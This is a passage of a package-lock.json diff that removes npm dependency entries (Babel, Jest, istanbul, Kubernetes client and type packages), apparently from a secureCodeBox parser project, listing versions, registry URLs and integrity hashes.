"https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", - "dev": true, - "requires": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" - } - }, - "@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", - "dev": true, - "requires": { - "@babel/types": "^7.26.0" - } - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" - } - }, - "@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - } - }, - "@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "requires": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - } - }, - "@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3" - } - }, - "@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - } - }, - "@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "dependencies": { - "istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "requires": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - } - }, - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.1.1.tgz", - "integrity": "sha512-sQXCasFk+U8lWYEe66WxRDOE9PjVz4vSM51fTu3Hw+ClTpUSQb718772vH3pyS5pShp6lvQM7SxgIDXXXmOX7w==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.0", - "@jridgewell/sourcemap-codec": "^1.4.10" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", - "dev": true, - "requires": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "openid-client": "^5.3.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" - }, - "dependencies": { - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", - "dev": true - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dev": true, - "requires": { - "argparse": "^2.0.1" - } - } - } - }, - "@securecodebox/parser-sdk-nodejs": { - "version": "file:../parser-sdk/nodejs", - "requires": { - "@kubernetes/client-node": "^0.22.3", - "ajv": "^8.17.1", - "ajv-draft-04": "^1.0.0", - "ajv-formats": "^3.0.1", - "axios": "^1.7.8", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" - } - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==", - "dev": true - }, - "@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/js-yaml": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", - "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==", - "dev": true - }, - "@types/node": { - "version": "20.17.10", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.10.tgz", - "integrity": "sha512-/jrvh5h6NXhEauFFexRin69nA0uHJ5gwk4iDivp/DeoEua3uwCUto6PC86IpRITBOs4+6i2I56K5x5b6WYGXHA==", - "dev": true, - "requires": { - "undici-types": "~6.19.2" - } - }, - "@types/request": { - "version": "2.48.8", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.8.tgz", - "integrity": "sha512-whjk1EDJPcAR2kYHRbFl/lKeeKYTi05A15K9bnLInCVroNDCtXce57xKdI0/rQaA3K+6q0eFyUBPmqfSndUZdQ==", - "dev": true, - "requires": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" - }, - "dependencies": { - "form-data": { - "version": "2.5.1", - "resolved": 